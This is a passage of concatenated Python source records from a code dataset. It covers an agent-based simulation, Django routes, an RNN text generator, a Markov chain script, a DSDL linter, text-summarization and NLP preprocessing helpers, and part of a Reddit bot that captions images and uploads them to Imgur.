collected information about the states of its neighbors \"\"\"\n\t\tfor agent in self.activated_agents:\n\t\t\tneighbors_states = [neighbor.state for neighbor in self.agents_network.neighbors(agent)]\n\t\t\tagent.update_neighbors_states(neighbors_states)\n\n\tdef agents_update_state(self):\n\t\t\"\"\" each agent updates its state \"\"\"\n\t\tfor agent in self.activated_agents:\n\t\t\tagent.update_state()\n\n\tdef return_system_convergence(self):\n\t\tstates = np.zeros(self.number_of_states, dtype = int)\n\t\tfor agent in self.agents_list:\n\t\t\tstates[agent.state] += 1\n\t\tstates = states / self.number_of_agents\n\t\treturn states.max()\n\n\tdef update_convergence_sequence(self):\n\t\ta = self.return_system_convergence()\n\t\tself.convergence_sequence.append(a)\n\n\tdef is_converged(self):\n\t\treturn self.return_system_convergence() > self.epsilon_convergence\n\n\tdef update_states_dynamics(self):\n\t\tstates = np.zeros(self.number_of_states, dtype = int)\n\t\tfor agent in self.agents_list:\n\t\t\tstates[agent.state] += 1\n\t\tstates = states / self.number_of_agents\n\n\t\tfor state in range(self.number_of_states):\n\t\t\tself.states_dynamics[state].append(states[state])\n\n\tdef one_time_step(self):\n\t\tself.sample_agents()\n\t\tself.collect_neighbor_states()\n\t\tself.agents_update_state()\n\n\tdef game(self):\n\t\tself.create_agents_list()\n\t\tself.assign_attributes()\n\t\tself.create_network()\n\t\tfor time in range(self.time_steps):\n\t\t\tself.one_time_step()\n\t\t\tif time % self.measure_system_states_time_interval == 0:\n\t\t\t\t#self.update_convergence_sequence()\n\t\t\t\t#self.update_states_dynamics()\n\t\t\t\tif self.is_converged():\n\t\t\t\t\tself.time_steps_to_convergence = time\n\t\t\t\t\treturn\n\t\t\t\t\t\"\"\" once the system has converged exit the game \"\"\"\n\t\tself.number_of_non_convergences += 1\n\n\n\n\"\"\"\nplt.plot(model_instance.states_dynamics[0])\nplt.plot(model_instance.states_dynamics[1])\nplt.plot(model_instance.states_dynamics[2])\nplt.xlabel(\"Time steps\", fontsize = 18)\nplt.ylabel(\"Proportion of agents in each state\", fontsize = 18)\nplt.title(\"Scale-free network transient dynamics: 10,000 agents, 3 states\",fontsize = 20)\nplt.grid()\nplt.show()\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"650917039","text":"from django.conf.urls import url\nfrom . 
import views\n\napp_name = 'news'\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^art/(?P[-\\w]+).html', views.article_view, name='news_view'),\n url(r'^gnr/(?P[-\\w]+).html', views.genre_detail, name='gnre_view'),\n]","sub_path":"news/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"411265415","text":"# @Time : 2020/11/5\n# @Author : Junyi Li, Gaole He\n# @Email : lijunyi@ruc.edu.cn\n\n# UPDATE:\n# @Time : 2021/1/2\n# @Author : Tianyi Tang\n# @Email : steventang@ruc.edu.cn\n\nr\"\"\"\nRNN\n################################################\n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom textbox.model.abstract_generator import UnconditionalGenerator\nfrom textbox.module.Decoder.rnn_decoder import BasicRNNDecoder\nfrom textbox.model.init import xavier_normal_initialization\n\n\nclass RNN(UnconditionalGenerator):\n r\"\"\" Basic Recurrent Neural Network for Maximum Likelihood Estimation.\n \"\"\"\n\n def __init__(self, config, dataset):\n super(RNN, self).__init__(config, dataset)\n\n # load parameters info\n self.embedding_size = config['embedding_size']\n self.hidden_size = config['hidden_size']\n self.num_dec_layers = config['num_dec_layers']\n self.rnn_type = config['rnn_type']\n self.dropout_ratio = config['dropout_ratio']\n self.eval_generate_num = config['eval_generate_num']\n self.max_length = config['max_seq_length']\n\n self.padding_token_idx = dataset.padding_token_idx\n self.sos_token_idx = dataset.sos_token_idx\n self.eos_token_idx = dataset.eos_token_idx\n\n # define layers and loss\n self.token_embedder = nn.Embedding(self.vocab_size, self.embedding_size, padding_idx=self.padding_token_idx)\n\n self.decoder = BasicRNNDecoder(self.embedding_size, self.hidden_size, self.num_dec_layers,\n self.rnn_type, self.dropout_ratio)\n\n self.dropout = nn.Dropout(self.dropout_ratio)\n self.vocab_linear = nn.Linear(self.hidden_size, self.vocab_size)\n\n self.loss = nn.CrossEntropyLoss(ignore_index=self.padding_token_idx, reduction='none')\n\n # parameters initialization\n self.apply(xavier_normal_initialization)\n\n def generate(self, eval_data):\n generate_corpus = []\n idx2token = eval_data.idx2token\n for _ in range(self.eval_generate_num):\n hidden_states = torch.zeros(self.num_dec_layers, 1, self.hidden_size).to(self.device)\n generate_tokens = []\n input_seq = torch.LongTensor([[self.sos_token_idx]]).to(self.device)\n for gen_idx in range(self.max_length):\n decoder_input = self.token_embedder(input_seq)\n outputs, hidden_states = self.decoder(decoder_input, hidden_states)\n token_logits = self.vocab_linear(outputs)\n token_probs = F.softmax(token_logits, dim=-1).squeeze()\n token_idx = torch.multinomial(token_probs, 1)[0].item()\n\n if token_idx == self.eos_token_idx:\n break\n else:\n generate_tokens.append(idx2token[token_idx])\n input_seq = torch.LongTensor([[token_idx]]).to(self.device)\n generate_corpus.append(generate_tokens)\n return generate_corpus\n\n def calculate_loss(self, corpus, epoch_idx=-1, nll_test=False):\n input_text = corpus['target_idx'][:, :-1]\n target_text = corpus['target_idx'][:, 1:]\n\n input_embeddings = self.dropout(self.token_embedder(input_text))\n outputs, hidden_states = self.decoder(input_embeddings)\n\n token_logits = self.vocab_linear(outputs)\n token_logits = token_logits.view(-1, token_logits.size(-1))\n\n loss = self.loss(token_logits, 
target_text.contiguous().view(-1)).reshape_as(target_text)\n        if (nll_test):\n            loss = loss.sum(dim = 1)\n        else:\n            length = corpus['target_length'] - 1\n            loss = loss.sum(dim = 1) / length.float()\n        return loss.mean()\n    \n    def calculate_nll_test(self, corpus, epoch_idx):\n        return self.calculate_loss(corpus, epoch_idx, nll_test=True)\n","sub_path":"textbox/model/LM/rnn.py","file_name":"rnn.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"329282373","text":"print('\\n')\nprint('\\n')\nprint('˚'*75)\nimport random\n\n# Read in all the words in one go\n# with open(\"applications/markov/input.txt\") as f:\nwith open(\"input.txt\") as f:\n    words = f.read()\n\n# Get just the words\nsplit_words = words.split()\n# print(split_words) # A single big list of all the words\n\ndataset = {}\n\n# Put all the words into dataset\nfor i in range(len(split_words)-1):\n    word = split_words[i]\n    next_word = split_words[i + 1]\n\n    # If it doesn't already exist, add it and the next word\n    if word not in dataset:\n        dataset[word]=[next_word]\n\n    # If it does already exist, append the next word\n    else:\n        dataset[word].append(next_word)\n\n# A list for the sentence starting words, built once the dataset is complete\nstartwords = []\nfor key in dataset.keys():\n    if key[0].isupper() or len(key) > 1 and key[1].isupper():\n        startwords.append(key)\nword = random.choice(startwords)\n\n# Sentence construction\nstopped = False\nstop_signs = \"?.!\"\n\nwhile not stopped:\n    # A startwords word\n    print(word, end=' ')\n\n    # If it's a stop word, stop\n    if word[-1] in stop_signs or len(word) > 1 and word[-2] in stop_signs:\n        stopped = True\n\n    # Choose a following word; the final corpus word may have no successors\n    following_words = dataset.get(word)\n    if not following_words:\n        break\n\n    word = random.choice(following_words)\n\n# The generation code must run only after the dataset loop has finished; lecture followed:
\n# https://youtu.be/j0bxDg0PXRM?t=306\n\n# When he runs it :\n# https://youtu.be/j0bxDg0PXRM?t=2062","sub_path":"applications/markov/markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"114259904","text":"#!/usr/bin/env python3\n\nimport sys\nimport time\nimport string\nimport pydsdl\nfrom functools import partial\n\n\nMAX_SERIALIZED_BIT_LENGTH = 313 * 8 # See README\nMAX_LINE_LENGTH = 120\nNAMESPACES_EXEMPTED_FROM_HEADER_COMMENT_REQUIREMENT = 'uavcan.primitive', 'uavcan.si'\nALLOWED_CHARACTERS = set(string.digits + string.ascii_letters + string.punctuation + ' ')\n\n\ndef die_at(ty, line_index, *text):\n prefix = '%s:%d:' % (ty.source_file_path, line_index + 1)\n print(prefix, *text, file=sys.stderr)\n sys.exit(1)\n\n\ndef on_print(file_path, line, value):\n print('%s:%d: %s' % (file_path, line, value), file=sys.stderr)\n\n\ndef compute_max_num_frames_canfd(bit_length):\n b = (bit_length + 7) // 8\n if b <= 63:\n return 1\n else:\n return (b + 2 + 62) // 63\n\n\nstarted_at = time.monotonic()\noutput = pydsdl.read_namespace('uavcan', [], print_output_handler=on_print)\nelapsed_time = time.monotonic() - started_at\n\nprint('Full data type name'.center(58),\n 'FSID'.center(5),\n 'CAN FD fr'.center(9))\n\nfor t in output:\n num_frames_to_str = lambda x: str(x) if x > 1 else ' ' # Return empty for single-frame transfers\n if isinstance(t, pydsdl.ServiceType):\n max_canfd_frames = ' '.join([\n num_frames_to_str(compute_max_num_frames_canfd(max(x.bit_length_set)))\n for x in (t.request_type, t.response_type)\n ])\n else:\n max_canfd_frames = num_frames_to_str(compute_max_num_frames_canfd(max(t.bit_length_set)))\n\n print(str(t).ljust(58),\n str(t.fixed_port_id if t.has_fixed_port_id else '').rjust(5),\n max_canfd_frames.rjust(7) + ' ')\n\nprint('%d data types in %.1f seconds' % (len(output), elapsed_time),\n file=sys.stderr)\n\nfor t in output:\n text = open(t.source_file_path).read()\n for index, line in enumerate(text.split('\\n')):\n line = line.strip('\\r\\n')\n abort = partial(die_at, t, index)\n\n # Check header comment\n if index == 0 and line != '#':\n if not any(map(lambda e: t.full_namespace.startswith(e),\n NAMESPACES_EXEMPTED_FROM_HEADER_COMMENT_REQUIREMENT)):\n abort('Every data type definition must have a header comment surrounded with \"#\\\\n\",',\n 'unless it is a member of:', NAMESPACES_EXEMPTED_FROM_HEADER_COMMENT_REQUIREMENT)\n\n # Check trailing comment placement\n # TODO: this test breaks on string literals containing \"#\"\n if not line.startswith('#') and '#' in line and ' #' not in line:\n abort('Trailing line comments must be separated from the preceding text with at least two spaces')\n\n if line != '#' and '#' in line and '# ' not in line:\n abort('The text of a comment must be separated from the comment character with a single space')\n\n if line.endswith(' '):\n abort('Trailing spaces are not permitted')\n\n # Check line length limit\n if len(line) > MAX_LINE_LENGTH:\n abort('Line is too long:', len(line), '>', MAX_LINE_LENGTH, 'chars')\n\n # Make sure we're not using any weird characters such as tabs or non-ASCII-printable\n for char_index, char in enumerate(line):\n if char not in ALLOWED_CHARACTERS:\n abort('Disallowed character', repr(char), 'code', ord(char), 'at column', char_index + 1)\n\n if not text.endswith('\\n') or text.endswith('\\n' * 2):\n abort('A file must contain exactly one blank line at the end')\n\n\ndef 
get_max_bit_length(ty) -> int:\n    if isinstance(ty, pydsdl.ServiceType):\n        return max(map(max, (ty.request_type.bit_length_set,\n                             ty.response_type.bit_length_set)))\n    else:\n        return max(ty.bit_length_set)\n\n\nfor t in output:\n    max_bit_length = get_max_bit_length(t)\n    if max_bit_length > MAX_SERIALIZED_BIT_LENGTH:\n        text = open(t.source_file_path).read()\n        if '#pragma:no-bit-length-limit' not in text.replace(' ', ''):\n            print('The data type', t, 'exceeds the bit length limit of', MAX_SERIALIZED_BIT_LENGTH, file=sys.stderr)\n            sys.exit(1)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"627028209","text":"class SummerTime:\n    # a text-summarization algorithm\n    # defines the LexRank-based method lex_rank_analysis\n    def lex_rank_analysis(self, parser_configuration, number_of_lines_to_output):\n        # Using LexRank\n        # LexRank also incorporates an intelligent post-processing step which makes sure\n        # that top sentences chosen for the summary are not too similar to each other.\n\n        # import LexRankSummarizer from the sumy api\n        from sumy.summarizers.lex_rank import LexRankSummarizer\n        # summarizer = the imported class LexRankSummarizer()\n        summarizer = LexRankSummarizer()\n        # Summarize the text and output n sentences\n        summarization_result = summarizer(parser_configuration.document, number_of_lines_to_output)\n        # debug raw output to console.\n        print(f\"\\nBegin Raw summary from LexRank\\n\")\n        for sentence in summarization_result:\n            print(sentence)\n        print(f\"\\nEnd Raw summary from LexRank\\n\")\n        # Return the summarizer result\n        return summarization_result\n\n    # a text-summarization algorithm\n    # defines the LSA-based method lsa_analysis\n    def lsa_analysis(self, parser_configuration, number_of_lines_to_output):\n        # using LSA\n        # LSA works by projecting the data into a lower dimensional\n        # space without any significant loss of information.\n        # singular vectors can capture and represent word combination patterns which are recurring\n\n        #import LsaSummarizer from the sumy api\n        from sumy.summarizers.lsa import LsaSummarizer\n        # summarizer = the imported class LsaSummarizer()\n        summarizer = LsaSummarizer()\n        # Summarize the text and output n sentences\n        summarization_result = summarizer(parser_configuration.document, number_of_lines_to_output)\n        # debug raw output to console.\n        print(f\"\\nBegin Raw summary from LSA\\n\")\n        for sentence in summarization_result:\n            print(sentence)\n        print(f\"\\nEnd Raw summary from LSA\\n\")\n        # Return the summarizer result\n        return summarization_result\n\n    # a text-summarization algorithm\n    # defines the Luhn-based method luhn_analysis\n    def luhn_analysis(self, parser_configuration, number_of_lines_to_output):\n        # using Luhn\n        # ranks sentences for summarization extracts by considering “significant” words,\n        # which are frequently occurring words in a document\n        from sumy.summarizers.luhn import LuhnSummarizer\n        # summarizer = the imported class LuhnSummarizer()\n        summarizer = LuhnSummarizer()\n        # Summarize the text and output n sentences\n        summarization_result = summarizer(parser_configuration.document, number_of_lines_to_output)\n        # debug raw output to console.\n        print(f\"\\nBegin Raw summary from Luhn\\n\")\n        for sentence in summarization_result:\n            print(sentence)\n        print(f\"\\nEnd Raw summary from Luhn\\n\")\n        # Return the summarizer result\n        return 
summarization_result\n\n","sub_path":"SummerTime.py","file_name":"SummerTime.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"90242615","text":"from nltk.stem import WordNetLemmatizer\nimport spacy\nfrom src.hooks.pretokenization import *\nfrom src.hooks.posttokenization import *\nfrom src.hooks.spell_check import *\nfrom src.hooks.annotation_normalization import *\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nimport copy\n\nnlp_small = spacy.load('en_core_web_lg', disable=[\"parser\", \"ner\"])\nnlp = spacy.load('en_core_web_lg')\n\n\ndef tokenize(raw, tokenizer=\"split\"):\n if tokenizer == \"spacy\":\n return [token.text for token in nlp.tokenizer(raw)]\n if tokenizer == \"split\":\n return raw.split(\" \")\n\n\nlemmatizer = WordNetLemmatizer()\n\n\ndef lemmatize(tokens):\n lem = list()\n for token in tokens:\n lem.append(lemmatizer.lemmatize(token))\n return lem\n\n\ndef build_vocab(data):\n vocab = dict()\n index = 1\n for sent in data:\n for word in sent:\n if word not in vocab.keys():\n vocab.update({word: index})\n index += 1\n return vocab\n\n\ndef encode_sentence(sentence, vocab):\n encoded = list()\n for word in sentence:\n if word in vocab.keys():\n encoded.append(vocab[word])\n else:\n encoded.append(0)\n return encoded\n\n\ndef encode_data(data, vocab):\n encoded_data = list()\n for sent in data:\n encoded_data.append(encode_sentence(sent, vocab))\n return encoded_data\n\n\ndef split_train_validate_test(data, labels, train_valtest_ratio, validate_test_ratio, random_state=42):\n X_train, X_valtest, y_train, y_valtest = train_test_split(data, labels, test_size=train_valtest_ratio,\n random_state=random_state)\n X_validate, X_test, y_validate, y_test = train_test_split(X_valtest, y_valtest, test_size=validate_test_ratio,\n random_state=random_state)\n\n return X_train, X_validate, X_test, y_train, y_validate, y_test\n\n\n# init_emoji(\"/home/ivan/Documents/git_repos/Sentiment-Analysis-on-Twitter/data/emoticons.txt\")\n\n\ndef process_dataset(data):\n dataset = list()\n for i in range(len(data)):\n new_tweet = repair_chars(data[i])\n anot = copy.deepcopy(new_tweet)\n anot = new_tweet\n new_tweet = remove_usernames(new_tweet)\n new_tweet = remove_links(new_tweet)\n new_tweet = replace_useful_emoticons(new_tweet)\n new_tweet = remove_punctuation(new_tweet)\n\n tweet_tokens = tokenize(new_tweet, tokenizer=\"spacy\")\n tweet_tokens = remove_stopwords(raw=\"\", tokenized=tweet_tokens)\n\n anot = annotation_normalization(anot)\n anot_tokens = tokenize(anot, tokenizer=\"split\")\n anot_tokens = spell_check_tokens(anot_tokens)\n anot_tokens = replace_slang_tokens(anot_tokens)\n anot_tokens = remove_stopwords_tokens(anot_tokens)\n anot_tokens = lemmatize(anot_tokens)\n\n dataset.append({\"tweet\": new_tweet, \"tweet_tokens\": tweet_tokens, \"anot\": anot, \"anot_tokens\": anot_tokens})\n # dataset.append({\"anot_tokens\": anot_tokens})\n return dataset\n\n\ndef create_vocab_encode_data(tokens):\n vocab = build_vocab(tokens)\n encoded_data = encode_data(data=tokens, vocab=vocab)\n return vocab, encoded_data\n\n\ndef pad_encoded_data(encoded, seq_length):\n features = np.zeros((len(encoded), seq_length), dtype=float)\n for i, review in enumerate(encoded):\n if len(review) > seq_length:\n review = review[:seq_length]\n zeroes = list(np.zeros(seq_length - len(review)))\n new = zeroes + review\n features[i, :] = np.array(new)\n return features\n\n\ndef 
make_embedding_matrix(vocab, embedding_dim=300):\n hits, misses = 0, 0\n embedding_matrix = np.zeros((len(vocab) + 1, embedding_dim))\n for word, i in vocab.items():\n token = nlp(word)\n if token.has_vector:\n embedding_matrix[i] = token.vector\n hits += 1\n else:\n misses += 1\n\n print(\"Converted %d words (%d misses)\" % (hits, misses))\n return embedding_matrix\n\n\ndef bag_of_words_embedding(data):\n print(\"BOW embedding...\")\n # corpus = np.array([d for d in data])\n return np.array([nlp(str(doc)).vector for doc in data])\n\n\ndef average_word_vectors(tokens, vocab, embedding_matrix, num_features=300):\n feature_vector = np.zeros((num_features,), dtype=\"float64\")\n n_words = 0.\n for word in tokens:\n if word in vocab:\n n_words += 1.\n feature_vector = np.add(feature_vector, embedding_matrix[vocab[word]])\n\n if n_words:\n feature_vector = np.divide(feature_vector, n_words)\n\n return feature_vector\n\n\ndef bow_averaged_embeddings(data, vocab, embedding_matrix):\n features = [average_word_vectors(tokenized_sentence, vocab, embedding_matrix)\n for tokenized_sentence in data]\n return np.array(features)\n","sub_path":"src/hooks/various_functions.py","file_name":"various_functions.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"47969856","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n\"\"\"\r\nTitle2ImageBot\r\nComplete redesign of titletoimagebot by gerenook with non-deprecated apis\r\n\r\nThis file contains the main methods, and the methods to handle post processing\r\nImage Processing / Imgur Uploading is done in t2utils\r\n\r\n\"\"\"\r\n\r\nauthor = 'calicocatalyst'\r\nversion = '0.3b'\r\n\r\nimport praw\r\nfrom praw.models import MoreComments, Comment\r\nimport pyimgur\r\nfrom PIL import Image, ImageDraw, ImageFont, ImageSequence\r\n\r\nfrom gfypy import gfycat\r\nimport argparse\r\nimport messages\r\nimport time\r\nimport logging\r\nfrom math import ceil\r\nfrom os import remove\r\nimport re\r\nimport requests\r\nfrom io import BytesIO\r\n\r\nimport configparser\r\n\r\n\r\nclass TitleToImageBot(object):\r\n def __init__(self):\r\n pass\r\n def check_mentions_for_requests(self, postlimit=10):\r\n for message in reddit.inbox.all(limit=postlimit):\r\n self.process_message(message)\r\n def check_subs_for_posts(self, postlimit=25):\r\n subs = get_automatic_processing_subs()\r\n for sub in subs:\r\n boot = sub == 'boottoobig'\r\n subr = reddit.subreddit(sub)\r\n for post in subr.new(limit=postlimit):\r\n if check_if_parsed(post.id):\r\n continue\r\n title = post.title\r\n if boot:\r\n triggers = [',', ';', 'roses']\r\n if not any(t in title.lower() for t in triggers):\r\n logging.debug('Title is probably not part of rhyme, skipping submission')\r\n add_parsed(post.id)\r\n continue\r\n self.process_submission(post, None, None)\r\n add_parsed(post.id)\r\n \r\n def reply_imgur_url(self, url, submission, source_comment, upscaled=False):\r\n \"\"\"\r\n :param url: Imgur Url\r\n :type url: str\r\n :param submission: Submission that the post was on. 
Reply if source_comment = False\r\n :type submission: praw.models.Submission\r\n :param source_comment: Comment that invoked bot if it exists\r\n :type source_comment: praw.models.Comment\r\n :returns: True on success, False on failure\r\n :rtype: bool\r\n \"\"\"\r\n if url == None:\r\n \r\n logging.info('URL returned as none.')\r\n logging.debug('Checking if Bot Has Already Processed Submission')\r\n # This should return if the bot has already replied.\r\n # So, lets check if the bot has already been here and reply with that instead!\r\n for comment in submission.comments.list():\r\n if isinstance(comment, MoreComments):\r\n # See praw docs on MoreComments\r\n continue\r\n if not comment or comment.author == None:\r\n # If the comment or comment author was deleted, skip it\r\n continue\r\n if comment.author.name == reddit.user.me().name and 'Image with added title' in comment.body:\r\n if source_comment:\r\n self.responded_already_reply(source_comment, comment, submission)\r\n \r\n add_parsed(submission.id)\r\n # Bot is being difficult and replying multiple times so lets try this :)\r\n return\r\n logging.info('Creating reply')\r\n reply = messages.standard_reply_template.format(\r\n image_url=url,\r\n nsfw=\"(NSFW)\" if submission.over_18 else '',\r\n upscaled=' (image was upscaled)\\n\\n' if upscaled else '',\r\n submission_id=submission.id\r\n )\r\n try:\r\n if source_comment:\r\n source_comment.reply(reply)\r\n else:\r\n submission.reply(reply)\r\n except praw.exceptions.APIException as error:\r\n logging.error('Reddit api error, we\\'ll try to repost later | %s', error)\r\n return False\r\n except Exception as error:\r\n logging.error('Cannot reply, skipping submission | %s', error)\r\n return False\r\n add_parsed(submission.id)\r\n return True\r\n \r\n def responded_already_reply(self, source_comment, comment, submission):\r\n com_url = messages.comment_url.format(postid=submission.id, commentid=comment.id)\r\n reply = messages.already_responded_message.format(commentlink=com_url)\r\n \r\n source_comment.reply(reply)\r\n \r\n add_parsed(source_comment.id)\r\n \r\n def process_submission(self, submission, source_comment, title):\r\n '''\r\n Process Submission Using t2utils given the above args, and use the other\r\n provided function to reply\r\n \r\n :param submission: Submission object containing image to parse\r\n :type submission: praw.models.submission\r\n :param source_comment: Comment that invoked if any did, may be NoneType\r\n :type source_comment: praw.models.Comment\r\n :param title: Custom title if any (Currently it will always be None)\r\n :type title: String\r\n '''\r\n \r\n url = process_image_submission(submission)\r\n self.reply_imgur_url(url, submission, source_comment)\r\n \r\n def process_message(self, message):\r\n \"\"\"Process given message (remove, feedback, mark good/bad bot as read)\r\n \r\n :param message: the inbox message, comment reply or username mention\r\n :type message: praw.models.Message, praw.models.Comment\r\n \"\"\"\r\n if not message.author:\r\n return\r\n author = message.author.name\r\n subject = message.subject.lower()\r\n body_original = message.body\r\n body = message.body.lower()\r\n if check_if_parsed(message.id):\r\n logging.debug(\"bot.process_message() Message %s Already Parsed, Returning\", message.id)\r\n return\r\n if message.author.name.lower()==\"the-paranoid-android\":\r\n message.reply(\"Thanks Marv\")\r\n logging.info(\"Thanking marv\")\r\n add_parsed(message.id)\r\n return\r\n # Skip Messages Sent by Bot\r\n if author == 
reddit.user.me().name:\r\n logging.debug('Message was sent, returning')\r\n return\r\n # process message\r\n if (isinstance(message, Comment) and\r\n (subject == 'username mention' or\r\n (subject == 'comment reply' and 'u/title2imagebot' in body))):\r\n # Dont reply to automod.\r\n if message.author.name.lower() == 'automoderator':\r\n message.mark_read()\r\n return\r\n \r\n match = False\r\n title = None\r\n if match:\r\n title = match.group(1)\r\n if len(title) > 512:\r\n title = None\r\n else:\r\n logging.debug('Found custom title: %s', title)\r\n self.process_submission(message.submission, message, title)\r\n \r\n message.mark_read()\r\n elif subject.startswith('feedback'):\r\n logging.debug(\"TODO: add feedback forwarding support\")\r\n # mark short good/bad bot comments as read to keep inbox clean\r\n elif 'good bot' in body and len(body) < 12:\r\n logging.debug('Good bot message or comment reply found, marking as read')\r\n message.mark_read()\r\n elif 'bad bot' in body and len(body) < 12:\r\n logging.debug('Bad bot message or comment reply found, marking as read')\r\n message.mark_read()\r\n add_parsed(message.id)\r\n \r\n def run(self, limit):\r\n logging.info('Checking Mentions')\r\n self.check_mentions_for_requests(limit)\r\n logging.info('Checking Autoreply Subs')\r\n self.check_subs_for_posts(limit)\r\n\r\n\r\n\r\n\r\nclass RedditImage:\r\n \"\"\"RedditImage class\r\n\r\n :param image: the image\r\n :type image: PIL.Image.Image\r\n \"\"\"\r\n margin = 10\r\n min_size = 500\r\n # TODO find a font for all unicode chars & emojis\r\n # font_file = 'seguiemj.ttf'\r\n font_file = 'roboto-emoji.ttf'\r\n font_scale_factor = 16\r\n # Regex to remove resolution tag styled as such: '[1000 x 1000]'\r\n regex_resolution = re.compile(r'\\s?\\[[0-9]+\\s?[xX*×]\\s?[0-9]+\\]')\r\n\r\n def __init__(self, image):\r\n self._image = image\r\n self.upscaled = False\r\n width, height = image.size\r\n # upscale small images\r\n if image.size < (self.min_size, self.min_size):\r\n if width < height:\r\n factor = self.min_size / width\r\n else:\r\n factor = self.min_size / height\r\n self._image = self._image.resize((ceil(width * factor),\r\n ceil(height * factor)),\r\n Image.LANCZOS)\r\n self.upscaled = True\r\n self._width, self._height = self._image.size\r\n self._font_title = ImageFont.truetype(\r\n self.font_file,\r\n self._width // self.font_scale_factor\r\n )\r\n\r\n def _split_title(self, title):\r\n \"\"\"Split title on [',', ';', '.'] into multiple lines\r\n\r\n :param title: the title to split\r\n :type title: str\r\n :returns: split title\r\n :rtype: list[str]\r\n \"\"\"\r\n lines = ['']\r\n all_delimiters = [',', ';', '.']\r\n delimiter = None\r\n for character in title:\r\n # don't draw ' ' on a new line\r\n if character == ' ' and not lines[-1]:\r\n continue\r\n # add character to current line\r\n lines[-1] += character\r\n # find delimiter\r\n if not delimiter:\r\n if character in all_delimiters:\r\n delimiter = character\r\n # end of line\r\n if character == delimiter:\r\n lines.append('')\r\n # if a line is too long, wrap title instead\r\n for line in lines:\r\n if self._font_title.getsize(line)[0] + RedditImage.margin > self._width:\r\n return self._wrap_title(title)\r\n # remove empty lines (if delimiter is last character)\r\n return [line for line in lines if line]\r\n\r\n def _wrap_title(self, title):\r\n \"\"\"Wrap title\r\n\r\n :param title: the title to wrap\r\n :type title: str\r\n :returns: wrapped title\r\n :rtype: list\r\n \"\"\"\r\n lines = ['']\r\n line_words = []\r\n 
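# Greedy wrap: keep appending words to the current line and start a new line\r\n        # as soon as the rendered line width plus the margin would exceed the image width.\r\n        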
words = title.split()\r\n for word in words:\r\n line_words.append(word)\r\n lines[-1] = ' '.join(line_words)\r\n if self._font_title.getsize(lines[-1])[0] + RedditImage.margin > self._width:\r\n lines[-1] = lines[-1][:-len(word)].strip()\r\n lines.append(word)\r\n line_words = [word]\r\n # remove empty lines\r\n return [line for line in lines if line]\r\n\r\n def add_title(self, title, boot, bg_color='#fff', text_color='#000'):\r\n \"\"\"Add title to new whitespace on image\r\n\r\n :param title: the title to add\r\n :type title: str\r\n :param boot: if True, split title on [',', ';', '.'], else wrap text\r\n :type boot: bool\r\n \"\"\"\r\n beta_centering = False\r\n # remove resolution appended to title (e.g. ' [1000 x 1000]')\r\n title = RedditImage.regex_resolution.sub('', title)\r\n line_height = self._font_title.getsize(title)[1] + RedditImage.margin\r\n lines = self._split_title(title) if boot else self._wrap_title(title)\r\n whitespace_height = (line_height * len(lines)) + RedditImage.margin\r\n new = Image.new('RGB', (self._width, self._height + whitespace_height), bg_color)\r\n new.paste(self._image, (0, whitespace_height))\r\n draw = ImageDraw.Draw(new)\r\n for i, line in enumerate(lines):\r\n w,h = self._font_title.getsize(line)\r\n left_margin = ((self._width - w)/2) if beta_centering else RedditImage.margin\r\n draw.text((left_margin, i * line_height + RedditImage.margin),\r\n line, text_color, self._font_title)\r\n self._width, self._height = new.size\r\n self._image = new\r\n\r\n def upload(self, imgur):\r\n \"\"\"Upload self._image to imgur\r\n\r\n :param imgur: the imgur api client\r\n :type imgur: imgurpython.client.ImgurClient\r\n :param config: imgur image config\r\n :type config: dict\r\n :returns: imgur url if upload successful, else None\r\n :rtype: str, NoneType\r\n \"\"\"\r\n path_png = 'temp.png'\r\n path_jpg = 'temp.jpg'\r\n self._image.save(path_png)\r\n self._image.save(path_jpg)\r\n try:\r\n response = imgur.upload_image(path_png, title=\"Uploaded by /u/Title2ImageBot\")\r\n except:\r\n # Likely too large\r\n logging.warning('png upload failed, trying jpg')\r\n try:\r\n response = imgur.upload_image(path_jpg, title=\"Uploaded by /u/Title2ImageBot\")\r\n except:\r\n logging.error('jpg upload failed, returning')\r\n return None\r\n finally:\r\n remove(path_png)\r\n remove(path_jpg)\r\n return response.link\r\n\r\n# -- UTILS --\r\n\r\ndef check_config_for_sub_threshold(sub, config_file=\"config.ini\"):\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n if config.has_option(sub, 'threshold'):\r\n return int(config[sub]['threshold'])\r\n else:\r\n return -1\r\n\r\ndef get_automatic_processing_subs(config_file=\"config.ini\"):\r\n config = configparser.ConfigParser()\r\n config.read(config_file)\r\n sections = config.sections()\r\n sections.remove('RedditAuth')\r\n sections.remove('ImgurAuth')\r\n sections.remove('GfyCatAuth')\r\n return sections\r\n\r\n\r\ndef process_image_submission(submission, commenter=None, customargs=None):\r\n # TODO implement user selectable options on summons\r\n\r\n # Make sure author account exists\r\n if not submission.author:\r\n add_parsed(submission.id)\r\n return None;\r\n\r\n sub = submission.subreddit.display_name\r\n url = submission.url\r\n title = submission.title\r\n author = submission.author.name\r\n\r\n # We need to verify everything is good to go\r\n # Check every item in this list and verify it is 'True'\r\n # If the submission has been 